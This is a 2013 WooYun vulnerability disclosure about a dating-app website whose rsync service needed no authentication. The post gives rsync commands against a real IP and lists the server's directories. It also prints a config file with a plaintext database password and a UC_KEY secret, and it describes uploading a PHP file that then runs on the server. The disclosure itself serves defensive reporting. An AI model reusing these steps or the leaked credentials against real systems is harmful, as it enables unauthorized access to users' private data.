当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041006

漏洞标题:手机交友APP-情人结网站配置不当导致数据泄漏(可直接上传shell)

相关厂商:情人结

漏洞作者: 盈盈无绪

提交时间:2013-10-25 16:56

修复时间:2013-12-09 16:57

公开时间:2013-12-09 16:57

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rsync配置不当导致数据泄漏

详细说明:

118.144.94.98配置了rsync的服务,但是没有身份认证就可以直接访问。
rsync 118.144.94.98::
www
尝试rsync网站内容到本地成功

rsync 118.144.94.98::www/love/
drwxrwxrwx        4096 2013/10/25 16:08:46 .
-rwxr-xr-x        2596 2011/10/11 09:48:42 admin.php
-rwxr-xr-x         741 2011/10/11 09:48:42 api.php
-rwxr-xr-x         877 2011/10/11 09:48:42 connect.php
-rwxr-xr-x         253 2011/10/11 09:48:42 cp.php
-rwxr-xr-x         106 2011/10/11 09:48:42 crossdomain.xml
-rwxr-xr-x        5558 2011/10/11 09:48:42 favicon.ico
-rwxr-xr-x        2112 2011/10/11 09:48:42 forum.php
-rwxr-xr-x         883 2011/10/11 09:48:42 group.php
-rwxr-xr-x        1096 2011/10/11 09:48:42 home.php
-rwxr-xr-x        5517 2011/10/11 09:48:42 index8.php
-rwxr-xr-x         956 2011/10/11 09:48:42 member.php
-rwxr-xr-x        1355 2011/10/11 09:48:42 misc.php
-rwxr-xr-x        1731 2011/10/11 09:48:42 plugin.php
-rwxr-xr-x        1077 2011/10/11 09:48:42 portal.php
-rwxr-xr-x         582 2011/10/11 09:48:42 robots.txt
-rwxr-xr-x        1192 2011/10/11 09:48:42 search.php
-rwxr-xr-x        1706 2011/10/11 09:48:42 userapp.php
drwxr-xr-x        4096 2011/12/02 15:42:36 api
drwxr-xr-x        4096 2011/12/02 15:42:36 archiver
drwxr-xr-x        4096 2011/12/02 15:44:56 config
drwxr-xr-x        4096 2011/12/04 19:46:44 data
drwxr-xr-x        4096 2011/12/02 16:11:56 install
drwxr-xr-x        4096 2013/10/25 16:08:09 iphone
drwxr-xr-x        4096 2012/07/11 18:51:06 mysql
drwxr-xr-x        4096 2011/12/02 15:42:36 source
drwxr-xr-x        4096 2011/12/02 15:42:36 static
drwxr-xr-x        4096 2011/12/02 15:42:38 template
drwxr-xr-x        4096 2011/12/02 15:42:40 uc_client
drwxr-xr-x        4096 2011/12/02 15:42:40 uc_server


发现有大量用户上传图片存放

rsync  118.144.94.98::www/love/data/attachment/album/
drwxr-xr-x        4096 2013/10/01 17:26:03 .
-rwxr-xr-x           0 2011/10/11 09:48:42 index.htm
drwxr-xr-x        4096 2012/03/12 13:52:25 201203
drwxr-xr-x        4096 2012/04/27 11:02:15 201204
drwxr-xr-x        4096 2012/05/31 12:04:35 201205
drwxr-xr-x        4096 2012/06/30 01:10:05 201206
drwxr-xr-x        4096 2012/07/31 00:21:19 201207
drwxr-xr-x        4096 2012/08/31 01:31:38 201208
drwxr-xr-x        4096 2012/09/30 05:21:14 201209
drwxr-xr-x        4096 2012/10/31 00:03:06 201210
drwxr-xr-x        4096 2012/11/30 03:32:52 201211
drwxr-xr-x        4096 2012/12/31 00:00:20 201212
drwxr-xr-x        4096 2013/01/31 00:00:04 201301
drwxr-xr-x        4096 2013/02/28 00:48:00 201302
drwxr-xr-x        4096 2013/03/31 01:02:25 201303
drwxr-xr-x        4096 2013/04/30 00:40:11 201304
drwxr-xr-x        4096 2013/05/31 00:26:16 201305
drwxr-xr-x        4096 2013/06/30 01:06:31 201306
drwxr-xr-x        4096 2013/07/31 00:06:46 201307
drwxr-xr-x        4096 2013/08/31 00:48:07 201308
drwxr-xr-x        4096 2013/09/30 04:10:57 201309
drwxr-xr-x        4096 2013/10/25 09:33:43 201310
drwxr-xr-x        4096 2012/03/05 14:04:10 cover


看配置文件发现数据库密码是adoado

<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', 'localhost');
define('UC_DBUSER', 'love');
define('UC_DBPW', 'adoado');
define('UC_DBNAME', 'love');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`love`.pre_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', '02EeJ5K2q7w775F8I91186tcz9fc9cE0Q0U9B19bQ0O8Vcg329a141b8R2x8Sf09');
define('UC_API', 'http://api.qingrenjie.me:88/uc_server');
define('UC_APPID', '1');
define('UC_IP', '127.0.0.1');
define('UC_PPP', 20);


尝试用这个密码登陆UCenter
UCenter 统计信息
应用总数:2
用户总数:59563
短消息数:0
好友记录数:30
通过rsync上传env.php成功
执行可见

PHP Version 5.2.17p1
System	Linux SNDA-172-17-11-3 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
Build Date	Jul 11 2012 16:13:37
Configure Command	 './configure' '--prefix=/usr/local/php' '--with-config-file-path=/usr/local/php/etc' '--with-apxs2=/usr/local/apache/bin/apxs' '--with-mysql=/usr/local/mysql' '--with-mysqli=/usr/local/mysql/bin/mysql_config' '--with-iconv-dir' '--with-freetype-dir' '--with-jpeg-dir' '--with-png-dir' '--with-zlib' '--with-libxml-dir=/usr' '--enable-xml' '--disable-rpath' '--enable-discard-path' '--enable-magic-quotes' '--enable-safe-mode' '--enable-bcmath' '--enable-shmop' '--enable-sysvsem' '--enable-inline-optimization' '--with-curl' '--with-curlwrappers' '--enable-mbregex' '--enable-mbstring' '--with-mcrypt' '--enable-ftp' '--with-gd' '--enable-gd-native-ttf' '--with-openssl' '--with-mhash' '--enable-pcntl' '--enable-sockets' '--with-xmlrpc' '--enable-zip' '--enable-soap' '--without-pear' '--with-gettext' '--with-mime-magic'
Server API	Apache 2.0 Handler
Virtual Directory Support	disabled
Configuration File (php.ini) Path	/usr/local/php/etc
Loaded Configuration File	/usr/local/php/etc/php.ini


渗透结束

漏洞证明:

aiqingjie.png

修复方案:

rsync必须有身份认证

版权声明:转载请注明来源 盈盈无绪@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝